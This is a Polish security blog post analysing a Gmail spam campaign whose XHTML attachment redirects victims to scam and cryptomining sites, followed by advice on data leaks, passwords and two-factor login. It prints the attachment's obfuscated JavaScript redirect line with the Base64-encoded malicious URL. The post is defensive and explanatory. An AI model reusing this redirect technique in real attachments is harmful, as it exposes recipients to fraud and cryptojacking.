Qa Ljdwq Icu Addih Dsfz, IQ IO FR VP LY TW PW QE XC, IP QO QP LA ZF KG UQ OD… To tylko trzy wybrane tytuły wiadomości mailowych, które dostarczane są na skrzynki odbiorcze w domenie GMail.com pomimo filtrów antyspamowych Google. Spam w pierwszych chwilach analizy wygląda bardzo tajemniczo, prawda? Co tak naprawdę ukrywa się w środku?
Jednorazowo wiadomość dostarczana jest do około 18-20 użytkowników i niestety w każdym przypadku dochodzi do ponownego ujawnienia adresów pocztowych wszystkich odbiorców. Do pustej treści dołączany jest jeden pliki XHTML, którego interpretują przeglądarki internetowe:
document.location.href=window.atob('aHR0cHM6Ly9nc3AuYnRjbWluaW56LnNpdGU/MTczMzYgIA==')W środku znajdujemy część zakodowanego tekstu w Base64. Używając dostępnych dekoderów online, szybko dowiadujemy się, że otworzenie załącznika (pliki XHTML są skojarzone z domyślną przeglądarką) poprowadzi ofiarę do stron z oszustwami i elementami odpowiedzialnymi za kopanie kryptowaluty Bitcoin.
Jedna z zakodowanych domen w pliku XHTML:
'aHR0cHM6Ly9nc3AuYnRjbWluaW56LnNpdGU/MTczMzYgIA==
Po zdekodowaniu:
hxxps://gsp.btcmininz.site?17336
W spamie pojawiają się podobne strony np. „btcminings.site?11784721753”. Większość z tych domen obecnie prowadzi do skryptów JavaScript używanych do generowania kryptowalut.
Niektóre przeglądarki, w tym Mozilla Firefox, domyślnie blokują tego typu zagrożenia sieciowe. Oszuści nie mają łatwo, ponieważ konieczna jest interakcja z użytkownikiem, aby zezwolić stronie internetowej na używanie zasobów komputera.
Całkiem nieźle działają zabezpieczenia programów antywirusowych, także usługa Google Safe Browsing, która jest wbudowana w popularne przeglądarki. Zadaniem tej usługi jest blokowanie złośliwych stron internetowych za pośrednictwem filtrów Google.
Wiadomości ze scamem dostarczane są do użytkowników z Polski (i nie tylko) z powodu wycieków danych, które zdarzały się w przeszłości. Przypomnijmy chociażby te największe:
- Wyciek danych 2,6 miliona polskich użytkowników z Facebooka (dziesiątki milionów z całego świata).
- Klientów Audi i Volkswagena.
- Wycieki klientów banku.
- Niepozorne wydobywanie kontaktów z poczty
- Wyciek danych znaczącej populacji
Konsekwencje wycieków danych
Nie pozostają bez konsekwencji wycieki mniejszych podmiotów, sklepów internetowych, forów internetowych itp. Ostatecznie nie ma właściwej drogi obrony przed otrzymywaniem wyżej opisanego spamu.
Zaleca się oznaczanie wiadomości jako SPAM, aby algorytm Google szybciej nauczył się wzorców i blokował podobne oszustwa. Można też spróbować dowiedzieć się skąd konkretnie pochodzi wyciek, ale nie będzie to jednoznaczne. Pomocne będą usługi HaveIBeenPwned i w szczególności F-Secure Identity Theft Checker (zobacz porównanie obu).
Wycieki danych zdarzały się i będą się zdarzać. Najważniejsze w tym wszystkim jest to, aby z każdego ujawnienia danych, a także kampanii ze scamem, nauczyć się czegoś nowego.
Po każdym wycieku trzeba zmieniać hasła. Wszędzie gdzie jest to możliwe należy aktywować dwuskładnikowe logowanie. Najlepiej zrobić to teraz, bez względu na to, czy doszło do zhackowania strony internetowej, którą często odwiedzasz.
Po odtajnieniu wrażliwych danych, takich jak adresy e-mail, kwestią czasu jest kiedy cyberprzestępcy wykorzystają je przeciwko ofiarom. Wykradzione bazy danych z cyberataków mogą być sprzedawane na forach (a nawet udostępniane za darmo) i używane do kolejnych oszustw, kradzieży tożsamości, szantażu.
Bądźcie czujni i ostrożni!
,
